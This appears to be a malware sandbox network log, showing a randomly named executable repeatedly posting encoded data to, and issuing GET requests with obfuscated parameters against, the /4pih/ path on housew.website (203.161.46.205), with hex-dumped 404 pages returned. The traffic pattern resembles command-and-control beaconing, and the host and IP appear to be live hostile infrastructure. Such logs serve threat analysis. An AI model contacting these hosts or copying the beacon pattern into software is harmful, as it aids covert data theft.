                                                                                  Nov 20, 2024 08:33:34.314567089 CET | 1236 | IN | Data Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                  Nov 20, 2024 08:33:34.314598083 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                  Data Ascii: font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { te
                                                                                  Nov 20, 2024 08:33:34.314630985 CET | 1236 | IN | Data Raw: 39 42 34 51 55 7a 73 56 31 58 4b 46 54 7a 44 50 47 2b 4c 66 6f 4c 70 45 2f 4c 6a 4a 6e 7a 4f 30 38 51 43 41 75 67 4c 61 6c 4b 65 71 50 2f 6d 45 6d 57 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34
                                                                                  Data Ascii: 9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTE
                                                                                  Nov 20, 2024 08:33:34.314661980 CET | 1236 | IN | Data Raw: 70 34 56 46 69 4c 38 57 4d 2f 43 6c 38 53 46 34 70 67 74 68 76 74 48 6d 34 71 51 55 49 69 51 64 59 2b 35 4e 4d 66 75 2f 32 32 38 50 6b 71 33 4e 5a 4e 4d 71 44 31 57 37 72 4d 6e 72 77 4a 65 51 45 6d 49 77 4b 73 61 63 4d 49 2f 54 56 4f 4c 6c 48 6a
                                                                                  Data Ascii: p4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFtt
                                                                                  Nov 20, 2024 08:33:34.314698935 CET1236INData Raw: 57 78 51 78 75 6b 6e 67 75 4a 31 53 38 34 41 52 52 34 52 77 41 71 74 6d 61 43 46 5a 6e 52 69 4c 32 6c 62 4d 2b 48 61 41 43 35 6e 70 71 2b 49 77 46 2b 36 68 68 66 42 57 7a 4e 4e 6c 57 36 71 43 72 47 58 52 79 7a 61 30 79 4e 4f 64 31 45 31 66 73 59
                                                                                  Data Ascii: WxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8
                                                                                  Nov 20, 2024 08:33:34.314790010 CET1236INData Raw: 6f 6e 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20
                                                                                  Data Ascii: on class="response-info"> <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this
                                                                                  Nov 20, 2024 08:33:34.314826012 CET443INData Raw: 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d
                                                                                  Data Ascii: ="container"> <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.6 | 50018 | 203.161.46.205 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:33:39.395322084 CET | 816 | OUT | POST /4pih/ HTTP/1.1
Host: www.housew.website
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Length: 213
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Origin: http://www.housew.website
Referer: http://www.housew.website/4pih/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:33:39.962527037 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Wed, 20 Nov 2024 07:33:39 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.6 | 50019 | 203.161.46.205 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:33:41.948102951 CET | 840 | OUT | POST /4pih/ HTTP/1.1
Host: www.housew.website
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Length: 237
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Origin: http://www.housew.website
Referer: http://www.housew.website/4pih/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:33:42.565973043 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Wed, 20 Nov 2024 07:33:42 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.6 | 50020 | 203.161.46.205 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe

Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 08:33:44.501368046 CET | 1853 | OUT | POST /4pih/ HTTP/1.1
Host: www.housew.website
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Length: 1249
Content-Type: application/x-www-form-urlencoded
Cache-Control: max-age=0
Origin: http://www.housew.website
Referer: http://www.housew.website/4pih/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
Nov 20, 2024 08:33:45.061866999 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Wed, 20 Nov 2024 07:33:44 GMT
Server: Apache
Content-Length: 16052
Connection: close
Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:45.061909914 CET | 224 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                  Nov 20, 2024 08:33:45.061964989 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                                                                                  Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                                                  Nov 20, 2024 08:33:45.062011003 CET | 1236 | IN | Data Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                                                                                  Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                                                                                  Nov 20, 2024 08:33:45.062043905 CET | 1236 | IN | Data Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                                                                                  Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                                                  Nov 20, 2024 08:33:45.062077999 CET | 672 | IN | Data Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                                                  Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                                                  Nov 20, 2024 08:33:45.062149048 CET | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                  Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                  Nov 20, 2024 08:33:45.062184095 CET | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                  Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                  Nov 20, 2024 08:33:45.062217951 CET | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                  Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                  Nov 20, 2024 08:33:45.062401056 CET | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                  Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                  Nov 20, 2024 08:33:45.067126989 CET | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                  Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  32 | 192.168.2.6 | 50021 | 203.161.46.205 | 80 | 3320 | C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 20, 2024 08:33:47.063721895 CET | 556 | OUT | GET /4pih/?9xn=fHadNpk8MVax&GR54yHZ8=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLPfqxdekucT9Chqzy6Pm+Rnw0xtYs44Mkmek35mpNA+VZaQoqJ0= HTTP/1.1
                                                                                  Host: www.housew.website
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:33:47.637972116 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:33:47 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:47.637990952 CET | 1236 | IN | Data Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                                  Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                  Nov 20, 2024 08:33:47.638000965 CET | 448 | IN | Data Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                                  Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                                  Nov 20, 2024 08:33:47.638020992 CET | 1236 | IN | Data Raw: 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31
                                                                                  Data Ascii: 01 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,
                                                                                  Nov 20, 2024 08:33:47.638031960 CET | 1236 | IN | Data Raw: 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39
                                                                                  Data Ascii: 3,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91
                                                                                  Nov 20, 2024 08:33:47.638123035 CET | 448 | IN | Data Raw: 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e
                                                                                  Data Ascii: 7,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,2
                                                                                  Nov 20, 2024 08:33:47.638195038 CET | 1236 | IN | Data Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                                                  Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                                                  Nov 20, 2024 08:33:47.638235092 CET | 1236 | IN | Data Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                                                  Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                                                  Nov 20, 2024 08:33:47.638246059 CET | 448 | IN | Data Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                                                  Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                                                  Nov 20, 2024 08:33:47.638315916 CET | 1236 | IN | Data Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                                                  Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                  Nov 20, 2024 08:33:47.643045902 CET | 1236 | IN | Data Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                                                  Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"


